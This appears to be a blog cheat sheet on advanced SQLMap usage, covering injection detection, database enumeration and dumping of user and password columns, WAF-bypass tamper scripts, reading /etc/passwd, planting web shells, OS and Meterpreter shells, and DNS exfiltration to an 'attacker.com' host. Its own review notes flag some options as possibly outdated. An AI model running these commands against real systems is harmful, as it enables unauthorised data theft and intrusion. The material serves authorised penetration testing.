
SQLMap Advanced Usage

Mar 05, 2025
4 min read
lawbyte

SQLMap automates SQL injection detection and exploitation. Knowing its options in depth is what separates a quick scan from a thorough assessment.

Basic Syntax

# GET parameter in the URL (every query-string parameter is a test candidate)
sqlmap -u "https://target.com/page?id=1"

# POST request: the parameters in --data are tested the same way
sqlmap -u "https://target.com/login" --data="user=admin&pass=test"

# From Burp request file: method, headers, cookies and body are all taken from
# the raw HTTP request in the file, so -u is not needed
sqlmap -r request.txt

# Cookie injection
sqlmap -u "https://target.com/page" --cookie="session=abc123; id=1*"
# (*) marks injection point manually. sqlmap asks before processing a marker,
# and with a marker present it tests only the marked positions.

# Header injection: the * marker works in any header value given with -H
sqlmap -u "https://target.com/page" -H "User-Agent: *"
sqlmap -u "https://target.com/page" -H "X-Forwarded-For: 127.0.0.1*"

Detection & Tuning

# Level (1-5): depth of tests. Default: 1
#   Higher levels add payloads and injection places: level 2 also tests cookie
#   values, level 3 also the User-Agent/Referer headers.
# Risk (1-3): risk of damaging the target. Default: 1
#   Risk 2 adds heavy time-based tests; risk 3 adds OR-based boolean tests,
#   which can change data when the vulnerable statement is an UPDATE/DELETE.
sqlmap -u "https://target.com/?id=1" --level=5 --risk=3

# Specify parameter to test (restricts testing to the named parameters;
# comma-separated for several)
sqlmap -u "https://target.com/?id=1&cat=2" -p id
sqlmap -u "https://target.com/?id=1&cat=2" -p "id,cat"

# Specify DBMS (skip fingerprinting). Only the payloads for that DBMS are sent,
# so a wrong value hides real injections; leave it unset when unsure.
sqlmap -u "URL" --dbms=mysql
sqlmap -u "URL" --dbms=mssql
sqlmap -u "URL" --dbms=oracle
sqlmap -u "URL" --dbms=postgresql
sqlmap -u "URL" --dbms=sqlite

# Technique specification (any subset of the letters below)
sqlmap -u "URL" --technique=BEUSTQ
# B=Boolean-based blind, E=Error-based, U=UNION, S=Stacked, T=Time-based, Q=Inline queries

# Force UNION columns: fix the column count / filler value instead of letting
# sqlmap enumerate them (fewer requests when the count is already known)
sqlmap -u "URL" --union-cols=5
sqlmap -u "URL" --union-char="NULL"

# Prefix/suffix for injection: strings put before/after every payload, for
# injection points that sit inside a quoted string or a bracketed expression
sqlmap -u "URL" --prefix="'" --suffix="-- -"

Enumeration

# Banner / version
sqlmap -u "URL" --banner

# Current database
sqlmap -u "URL" --current-db

# Current user
sqlmap -u "URL" --current-user

# Is DBA (whether the current DB user has administrative privileges; this
# decides whether the OS Interaction options further down are possible at all)
sqlmap -u "URL" --is-dba

# All databases
sqlmap -u "URL" --dbs

# Tables in a database
sqlmap -u "URL" -D target_db --tables

# Columns in a table
sqlmap -u "URL" -D target_db -T users --columns

# Dump a table
# Dumped data is written to sqlmap's output directory (under the user's home
# unless --output-dir is set) and stays there; handle and delete it with the
# same care as the source data.
sqlmap -u "URL" -D target_db -T users --dump

# Dump specific columns (limits the dump to the named columns)
sqlmap -u "URL" -D target_db -T users -C "username,password" --dump

# Dump all databases: every table of every database — large output, long
# runtime and heavy load on the target; size tables with --count first
sqlmap -u "URL" --dump-all

# Search for column name across all DBs (by default a substring match:
# "password" also hits names such as "password_hint")
sqlmap -u "URL" --search -C password
sqlmap -u "URL" --search -T users

# Count rows before dumping (cheap way to size a table before --dump)
sqlmap -u "URL" -D db -T users --count

Authentication

# HTTP Basic Auth
# Credentials passed on the command line land in shell history and are visible
# to other local users through the process list.
sqlmap -u "URL" --auth-type=Basic --auth-cred="user:pass"

# HTTP Digest
sqlmap -u "URL" --auth-type=Digest --auth-cred="user:pass"

# Cookie-based session (the cookie is sent as-is with every request)
sqlmap -u "URL" --cookie="PHPSESSID=abc123; token=xyz"

# Set headers (e.g., JWT) — the token is exposed the same way as --auth-cred
sqlmap -u "URL" -H "Authorization: Bearer JWT_TOKEN"

# POST parameters tested while reusing an existing session cookie.
# Note: this does not perform a login; the cookie has to come from a session
# that is already authenticated.
sqlmap -u "URL" --data="user=admin&pass=test" \
--cookie="session=abc123"

# Login form as the injection target, with a second-order check.
# Note: --second-url does not create a session. sqlmap sends the POST, then
# fetches --second-url and looks for the injection's effect in that response
# (second-order SQLi); it is not a "log in first, then test" mechanism.
sqlmap -u "https://target.com/login" \
--data="username=admin&password=admin" \
-H "Referer: https://target.com/login" \
--second-url="https://target.com/profile?id=1"

Tamper Scripts (WAF Bypass)

# List tamper scripts (each entry describes what the script rewrites; some
# entries also name the DBMS they apply to)
sqlmap --list-tampers

# Common tampers
# Several tampers can be chained; sqlmap applies them in each script's built-in
# priority order, not necessarily in the order given on the command line.
sqlmap -u "URL" --tamper=space2comment
# Replaces spaces with /* */ comments

sqlmap -u "URL" --tamper=between
# Replaces > with NOT BETWEEN 0 AND X (and = with BETWEEN X AND X)

sqlmap -u "URL" --tamper=randomcase
# Randomizes case of keywords: SeLeCt

sqlmap -u "URL" --tamper=charencode
# URL-encodes all characters (already-encoded ones are left alone)

sqlmap -u "URL" --tamper=charunicodeescape
# Unicode-escapes the non-encoded payload characters (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)

sqlmap -u "URL" --tamper=equaltolike
# Replaces = with LIKE

sqlmap -u "URL" --tamper=base64encode
# Base64 encodes payload

sqlmap -u "URL" --tamper=hex2char
# Replaces hex strings with chr() equivalents (MySQL 0x.. literals -> CONCAT(CHAR(..)))

# Combine multiple tampers
sqlmap -u "URL" --tamper=space2comment,randomcase,charencode

# MySQL WAF bypass combo
# Some of these are MySQL-specific (concat2concatws, ifnull2ifisnull), so the
# combo is not portable to other DBMSs; chaining many tampers also lengthens
# every payload.
sqlmap -u "URL" --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,ifnull2ifisnull,space2comment

# MSSQL WAF bypass combo
sqlmap -u "URL" --tamper=between,charencode,randomcase,space2comment

OS Interaction

These options require DBA privileges on the target database:

# File read (needs the DBMS's file-read privilege; the retrieved file is saved
# under sqlmap's output directory)
sqlmap -u "URL" --file-read="/etc/passwd"
sqlmap -u "URL" --file-read="C:/Windows/win.ini"

# File write (web shell)
# This leaves a persistent artifact on the host: record every --file-dest path
# (and any helper files sqlmap uploads for --os-cmd/--os-shell) so they can be
# removed and reported at the end of the engagement.
sqlmap -u "URL" --file-write=shell.php --file-dest="/var/www/html/shell.php"
sqlmap -u "URL" --file-write=cmd.aspx --file-dest="C:/inetpub/wwwroot/cmd.aspx"

# OS command execution (commands typically run under the DBMS service account)
sqlmap -u "URL" --os-cmd="whoami"
sqlmap -u "URL" --os-shell # interactive shell

# OOB (out-of-band) data retrieval via DNS — not a shell: query results are
# carried inside DNS lookups for subdomains of the given domain, so every
# retrieved chunk shows up in the target's resolver logs
sqlmap -u "URL" --dns-domain=attacker.com

# Meterpreter payload via sqlmap
sqlmap -u "URL" --os-pwn # via Metasploit
sqlmap -u "URL" --msf-path=/usr/bin/ # directory holding the local Metasploit tools; used with --os-pwn

Proxies & Logging

# Route through Burp (every request, including dumps, passes through the proxy)
sqlmap -u "URL" --proxy="http://127.0.0.1:8080"

# TOR (--check-tor verifies that traffic actually leaves via Tor before testing)
sqlmap -u "URL" --tor --tor-type=SOCKS5 --check-tor

# Randomize user agent
sqlmap -u "URL" --random-agent

# Custom user agent
sqlmap -u "URL" --user-agent="Mozilla/5.0 ..."

# Output directory (session files and dumped data go here)
sqlmap -u "URL" --output-dir=/tmp/sqlmap_out

# Traffic log: records all HTTP traffic, including cookies and auth headers, so
# protect the file like a credential store
sqlmap -u "URL" --traffic-file=traffic.log

# Verbose output (3 adds injected payloads, 4 adds HTTP requests,
# 5 adds response headers, 6 adds response bodies)
sqlmap -u "URL" -v 3 # show payloads injected (HTTP requests appear from -v 4)
sqlmap -u "URL" -v 6 # max verbosity — full HTTP

# Batch mode: never prompts, takes the default answer for every question
# (not always "yes"); review the log afterwards for the choices it made
sqlmap -u "URL" --batch

# Results as CSV
# NOTE(review): sqlmap's option for the dump format is --dump-format=CSV (CSV is
# already the default); confirm that --csv is accepted by the installed version.
sqlmap -u "URL" -D db -T users --dump --csv

Burp Request Integration

# Save request from Burp (right-click → Copy to file, or Burp Logger++)
# Modify the parameter to test with *

cat request.txt
POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=admin*&password=test

# The * marker in the body already selects the injection point, so -p username
# is presumably redundant here (harmless either way). --risk=2 enables the
# heavier time-based tests; see Detection & Tuning.
sqlmap -r request.txt -p username --level=3 --risk=2 --batch --dbs

Blind SQLi Tuning

# Time-based only (--time-sec is the delay sqlmap asks the DB to sleep; 5 is
# the default)
sqlmap -u "URL" --technique=T --time-sec=5

# Increase delay tolerance: a longer sleep reduces false positives on jittery
# links at the cost of much slower extraction (each bit of data costs at least
# one delayed request)
sqlmap -u "URL" --technique=T --time-sec=10

# Adjust for slow connections (defaults: --timeout 30 seconds, --retries 3)
sqlmap -u "URL" --timeout=30 --retries=5

# Boolean-based blind (sqlmap retrieves values by bisection by default)
sqlmap -u "URL" --technique=B

# No heavy techniques (safer): skips stacked and time-based tests, the ones
# that hold DB connections and put load on the target
sqlmap -u "URL" --technique=BE --level=2 --risk=1

# Chunked dumps (for large tables): --start/--stop are the first/last table
# entries to retrieve
sqlmap -u "URL" -D db -T users --dump --start=1 --stop=100

Second-Order SQLi

# First request stores payload, second request triggers it
# (sqlmap sends the injected request to -u, then fetches --second-url and
# looks for the injection's effect in that response)
sqlmap -u "https://target.com/register" \
--data="username=admin&email=test@test.com" \
--second-url="https://target.com/profile/admin"

# Or specify second request file (same raw HTTP format as -r)
sqlmap -r register_request.txt --second-req=profile_request.txt

WAF Detection & Evasion

# Identify WAF
# NOTE(review): recent sqlmap releases run WAF/IPS detection automatically at
# start-up (disable with --skip-waf); --identify-waf and --check-waf below may
# be rejected as unknown options by current versions — check `sqlmap --help`.
sqlmap -u "URL" --identify-waf

# Slow down to evade rate limiting
sqlmap -u "URL" --delay=2 # 2 seconds between requests
# --safe-freq only has an effect together with --safe-url (or --safe-req):
# every N test requests sqlmap visits the safe URL so a session or blacklist
# counter is reset; pass both on the same command line.
sqlmap -u "URL" --safe-freq=3 # every 3 requests, go to safe URL
sqlmap -u "URL" --safe-url="https://target.com/"

# Chunked encoding bypass
# Note: setting the header alone does not chunk the body, so the request is
# malformed; sqlmap's --chunked option produces real chunked POST bodies.
sqlmap -u "URL" -H "Transfer-Encoding: chunked"

# HTTP persistent connections (reuses one TCP connection; this is keep-alive,
# not pipelining)
# NOTE(review): sqlmap does not accept this together with --proxy — confirm
# with the installed version.
sqlmap -u "URL" --keep-alive

# Custom invalid request to detect WAF behavior (see the note on --identify-waf)
sqlmap -u "URL" --check-waf

# Combined evasion (--batch means every prompt is answered with its default;
# check the log afterwards for what sqlmap decided on its own)
sqlmap -u "URL" \
--random-agent \
--delay=1 \
--tamper=space2comment,randomcase \
--level=3 --risk=2 \
--batch
